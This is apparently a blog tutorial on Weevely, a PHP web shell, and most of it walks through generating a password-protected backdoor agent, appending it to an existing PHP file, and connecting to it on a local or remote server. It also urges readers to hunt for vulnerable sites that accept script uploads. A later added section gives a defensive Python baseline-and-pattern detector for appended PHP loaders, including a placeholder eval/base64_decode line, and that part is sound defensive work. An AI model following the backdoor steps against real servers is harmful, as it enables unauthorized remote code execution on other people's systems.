A backdoor is a method, often kept secret, of bypassing a system's regular authentication and giving whoever planted it quicker access to the endpoint. Backdoors can be added in a variety of ways and with the help of various tools. One such tool is Weevely.
Weevely simulates a telnet-like connection and is a stealthy PHP web shell. Although it is mainly used for web application post-exploitation, it can also serve as a stealth backdoor, or as a web shell to manage free hosted accounts or legitimate web connections. It also contains many modules for administration and maintenance needs. What Weevely does here is allow remote code execution through a small-footprint PHP agent.
The First Step Would Be To Download & Install Weevely
This step can be skipped if you are on a Linux distribution that already ships Weevely. If you are not on one, head over to the project's GitHub page. There are several ways to get Weevely onto your distro: you can clone the Git repository, or download the archive over HTTP in your browser.
Creating The PHP Snippet
Head over to the folder containing the downloaded archive (weevely3-master.zip) and open a terminal window there. As an example, run the following commands:
cd Downloads [Assuming your weevely3-master.zip is inside your Downloads folder, we head over to it]
unzip weevely3-master.zip [Let's unzip the file]
cd weevely3-master/ [Let's jump into the folder that was just unzipped]
ls [A quick listing to check out the files]
./weevely.py [To get a fair idea of what's what]
After running that command you should see the ‘Generate backdoor agent’ option, with its usage format right beneath it: it takes a password and a file name. For the sake of this article, let’s set ‘tcf’ as our password and call our file bckdor.php. Now run the following command:
./weevely.py generate tcf bckdor.php
You should now end up with a file called bckdor.php in the directory you’re working in. Remember to replace ‘tcf’ with the password you chose and ‘bckdor.php’ with the file name you chose in the above command. Also, let’s ignore my terrible naming skills. You might want to use less obvious names.
Slipping The Backdoor In
Now that we have our brand new PHP script, bckdor.php, we can put it to use. First, paste the contents of bckdor.php into another PHP file on your server that is reachable over the web: copy the entire contents of bckdor.php below the existing contents of that PHP file.
Although I’m pretty sure you have already done this, at this point you might want to search for a website that lets you share files or images, basically, a vulnerable website. All the best finding a website that lets you upload scripts.
The ultimate goal here is to somehow get your PHP file, or at least its contents, into some other PHP file on a server, local or remote.
Time To Access That Backdoor
One great thing about Weevely is that the PHP file running in the web directory shows nothing in your web browser; if it did, someone else could discover or exploit it before you do. Now, if you have completed the steps above, open weevely.py again and target the file.
For the local server: ./weevely.py http://localhost/settings.php tcf [You can see that I used the settings.php file]
For the remote server: ./weevely.py http://nameofthewebsite.com/bckdor.php tcf
Now that you have reached this point, run :help to see what you are already able to do. As said before, Weevely has many modules built in.
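The two things this walkthrough relies on, an agent appended below the contents of an existing PHP file and a page that renders nothing in the browser, are exactly why defenders do not look for this by browsing, but by comparing the web root against a known-good baseline. The following Python script is an added example, not part of the original post and not Weevely's own code. It hashes the PHP files under a web root, reports files that changed since the baseline, checks whether a change is a pure append below the original contents (the pattern described above), and flags generic obfuscation constructs in the changed file. The sample files, the appended block, and the pattern list are constructed for the demo; the patterns are a generic heuristic, not a signature for Weevely's agent, which this example does not reproduce.

```python
import hashlib
import os
import re

# Constructed sample: a legitimate-looking settings.php, and the block that
# gets appended below it. The appended block is a placeholder loader written
# for this demo, not a real agent.
CLEAN_SETTINGS = b"<?php\n$db_host = 'localhost';\n$db_user = 'app';\n"
APPENDED_BLOCK = (
    b"\n/* constructed: obfuscated block appended below the original file */\n"
    b"eval(base64_decode($_COOKIE['PLACEHOLDER']));\n"
)

# Constructs that config and template files rarely need but that obfuscated
# PHP loaders commonly use. Generic heuristic, not a tool-specific signature.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(rb"\beval\s*\("),
    "base64_decode": re.compile(rb"\bbase64_decode\s*\("),
    "gzinflate/gzuncompress": re.compile(rb"\bgz(inflate|uncompress)\s*\("),
    "str_rot13": re.compile(rb"\bstr_rot13\s*\("),
    "create_function": re.compile(rb"\bcreate_function\s*\("),
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_directory(root: str) -> dict:
    """Map each .php file under root (path relative to root) to its bytes.
    Used to build the baseline on a trusted copy and later snapshots to audit."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return files


def build_baseline(files: dict) -> dict:
    """Path -> SHA-256 of content; store this somewhere the web server cannot write."""
    return {path: sha256(data) for path, data in files.items()}


def diff_against_baseline(baseline: dict, files: dict) -> dict:
    current = build_baseline(files)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {"added": added, "removed": removed, "modified": modified}


def suspicious_constructs(data: bytes) -> list:
    """Names of the heuristic patterns that occur in data, sorted."""
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(data))


def appended_tail(original: bytes, current: bytes):
    """If current is the original with extra bytes appended, return those bytes,
    otherwise None. A pure append is the change pattern this post describes."""
    if current.startswith(original) and len(current) > len(original):
        return current[len(original):]
    return None


def audit(baseline_files: dict, current_files: dict) -> dict:
    """For every new or modified PHP file, report whether the change is a pure
    append and which suspicious constructs the current contents contain."""
    delta = diff_against_baseline(build_baseline(baseline_files), current_files)
    report = {}
    for path in delta["added"] + delta["modified"]:
        data = current_files[path]
        tail = appended_tail(baseline_files[path], data) if path in baseline_files else None
        report[path] = {
            "status": "added" if path in delta["added"] else "modified",
            "pure_append": tail is not None,
            "suspicious": suspicious_constructs(data),
        }
    return report


if __name__ == "__main__":
    # Constructed in-memory web root, before and after the append.
    before = {"settings.php": CLEAN_SETTINGS, "index.php": b"<?php echo 'hi';\n"}
    after = dict(before, **{"settings.php": CLEAN_SETTINGS + APPENDED_BLOCK})
    for path, info in audit(before, after).items():
        print(path, info)
```

In practice you would call snapshot_directory on the web root right after deployment, keep the baseline hashes outside the web server's reach, and re-run audit from cron; a modified file whose change is a pure append carrying eval or base64_decode is worth an immediate look, while a legitimately redeployed file will show as modified without the other two findings.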
What commands would you recommend next? If you have looked around already, what did you find most interesting? Do let us know through the comments. Have fun, but don’t get too overwhelmed with your newly-found power.
[It should be noted that this post is purely for educational purposes]